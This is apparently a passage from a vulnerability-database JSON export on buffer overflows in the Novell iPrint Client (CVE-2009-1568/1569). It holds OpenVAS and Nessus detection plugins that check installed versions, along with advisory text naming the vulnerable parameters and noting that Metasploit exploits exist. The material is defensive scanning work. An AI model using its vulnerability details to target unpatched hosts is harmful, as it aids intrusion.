script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37169\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name : \"URL\" , value : \"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\niPrintVer = get_kb_item(\"Novell/iPrint/Client/Linux/Ver\");\nif(iPrintVer == NULL){\n exit(0);\n}\n\nif(version_is_less(version:iPrintVer, test_version:\"5.32\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.", "modified": "2020-04-27T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:1361412562310900728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900728", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900728\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Novell/iPrint/Client/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation lets the remote attacker have a control over\n the remote system registers allowing execution of malformed shellcode.\");\n script_tag(name:\"affected\", value:\"Novell iPrint Client version prior to 5.32\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application\n context.\");\n script_tag(name:\"solution\", 
value:\"Upgrade Novell iPrint Client version to 5.32.\");\n script_tag(name:\"summary\", value:\"This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37169\");\n script_xref(name:\"URL\", value:\"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name:\"URL\", value:\"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\niPrintVer = get_kb_item(\"Novell/iPrint/Client/Linux/Ver\");\nif(!iPrintVer)\n exit(0);\n\nif(version_is_less(version:iPrintVer, test_version:\"5.32\")){\n report = report_fixed_ver(installed_version:iPrintVer, fixed_version:\"5.32\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:1361412562310900729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900729", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, 
http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:novell:iprint\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900729\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37169\");\n script_xref(name:\"URL\", value:\"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name:\"URL\", value:\"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer 
overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Novell/iPrint/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation lets the remote attacker have a control over the remote\n system registers allowing execution of malformed shellcode.\");\n\n script_tag(name:\"affected\", value:\"Novell iPrint Client version prior to 5.32.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application context.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Novell iPrint Client version to 5.32.\");\n\n script_tag(name:\"summary\", value:\"This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"5.32\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.32\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-21T11:44:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.", "modified": "2017-12-20T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:900729", "href": "http://plugins.openvas.org/nasl.php?oid=900729", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Windows)", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_novell_iprint_client_mult_bof_vuln_win.nasl 8201 2017-12-20 14:28:50Z cfischer $\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:novell:iprint\";\n\ntag_impact = \"Successful exploitation lets the remote attacker have a control over the remote\n system registers allowing execution of malformed shellcode.\n\n Impact Level: System\";\ntag_affected = \"Novell iPrint Client version prior to 5.32\";\ntag_insight = \"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application\n context.\";\ntag_solution = \"Upgrade Novell iPrint Client version to 5.32\n http://download.novell.com\";\ntag_summary = \"This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900729);\n script_version(\"$Revision: 8201 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 15:28:50 +0100 
(Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37169\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name : \"URL\" , value : \"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Novell/iPrint/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"5.32\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.32\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 
9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:26:20", "description": "BUGTRAQ ID: 37242\r\nCVE ID: CVE-2009-1568,CVE-2009-1569\r\n\r\nThe Novell iPrint printing solution allows users to send documents to network printers.\r\n\r\nienipp.ocx in the iPrint client has a stack overflow vulnerability when parsing the target-frame parameter, and certain methods have another stack overflow when parsing time information. A user who is tricked into viewing a malicious web page may trigger these overflows, resulting in arbitrary code execution.\n\nNovell iPrint Client 5.30\r\nNovell iPrint Client 4.38\nVendor patch:\r\n\r\nNovell\r\n------\r\nThe vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:\r\n\r\nhttp://download.novell.com/Download?buildid=29T3EFRky18~", "published": "2009-12-14T00:00:00", "type": "seebug", "title": "Novell iPrint Client Multiple Stack Overflow Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "modified": "2009-12-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15060", "id": "SSV:15060", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T04:20:12", "description": "The remote host has Novell iPrint Client installed.\n\nThe installed version of Novell iPrint Client is affected by multiple\nbuffer overflow vulnerabilities :\n\n - A stack-based buffer overflow exists due to insufficient\n boundary checks on the 'target-frame' parameter.\n 
(CVE-2009-1568)\n\n - A stack-based buffer overflow exists due to insufficient\n validation of time information. (CVE-2009-1569)", "edition": 28, "published": "2009-12-08T00:00:00", "title": "Novell iPrint Client < 5.32 Multiple Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:novell:iprint"], "id": "NOVELL_IPRINT_532.NASL", "href": "https://www.tenable.com/plugins/nessus/43060", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43060);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2009-1568\",\"CVE-2009-1569\");\n script_bugtraq_id(37242);\n script_xref(name:\"Secunia\", value:\"35004\");\n script_xref(name:\"Secunia\", value:\"37169\");\n\n script_name(english:\"Novell iPrint Client < 5.32 Multiple Overflows\");\n script_summary(english:\"Checks version of Novell iPrint Client\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains an application that is affected by multiple\nbuffer overflow vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has Novell iPrint Client installed.\n\nThe installed version of Novell iPrint Client is affected by multiple\nbuffer overflow vulnerabilities :\n\n - A stack-based buffer overflow exists due to insufficient\n boundary checks on the 'target-frame' parameter.\n (CVE-2009-1568)\n\n - A stack-based buffer overflow exists due to insufficient\n validation of time information. 
(CVE-2009-1569)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2009-40\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2009-44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2009/Dec/174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2009/Dec/175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.novell.com/Download?buildid=29T3EFRky18~\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Novell iPrint Client 5.32 or later.\n\nNote: There is no fix available for Novell iPrint Client 4.x branch.\nUsers should consider upgrading to 5.32\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell iPrint Client ActiveX Control Date/Time Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:novell:iprint\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(1,\"The 'SMB/Registry/Enumerated' KB item is not set to TRUE.\");\n\nwinroot = hotfix_get_systemroot();\nif (!winroot) exit(1, \"The 'SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/SystemRoot' KB item is missing.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:winroot);\ndll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\System32\\nipplib.dll\", string:winroot);\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL,share);\n}\n\nfh = CreateFile(file:dll,\n\tdesired_access:GENERIC_READ,\n\tfile_attributes:FILE_ATTRIBUTE_NORMAL,\n\tshare_mode:FILE_SHARE_READ,\n\tcreate_disposition:OPEN_EXISTING);\n\nif (isnull(fh))\n{\n NetUseDel();\n exit(0, \"The file '\"+winroot+\"\\System32\\nipplib.dll' does not exist.\");\n}\n\nver = GetFileVersion(handle:fh);\nCloseFile(handle:fh);\nNetUseDel();\n\n# Check the version number.\nif (!isnull(ver))\n{\n version_ui = ver[0] + \".\" + ver[1] + ver[2];\n\n # Save the info for other plugins.\n set_kb_item(name:\"SMB/Novell/iPrint/DLL\", value:winroot + \"\\System32\\nipplib.dll\");\n set_kb_item(name:\"SMB/Novell/iPrint/Version\", value:join(ver, sep:\".\"));\n set_kb_item(name:\"SMB/Novell/iPrint/Version_UI\", value:version_ui);\n\n # Version that is not vulnerable.\n fixed_version_ui = \"5.32\";\n fix = split(\"5.3.2.0\", sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(ver); i++)\n if ((ver[i] < fix[i]))\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n' +\n \"File : \" + winroot + \"\\System32\\nipplib.dll\" + '\\n' +\n \"Installed version : \" + version_ui + '\\n' +\n \"Fixed version : \" + fixed_version_ui + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n else if (ver[i] > fix[i])\n break;\n\n exit(0, \"The host is not affected since Novell iPrint Client \"+version_ui+\" is installed.\");\n}\nelse exit(1, \"Can't get file version of 'nipplib.dll'.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}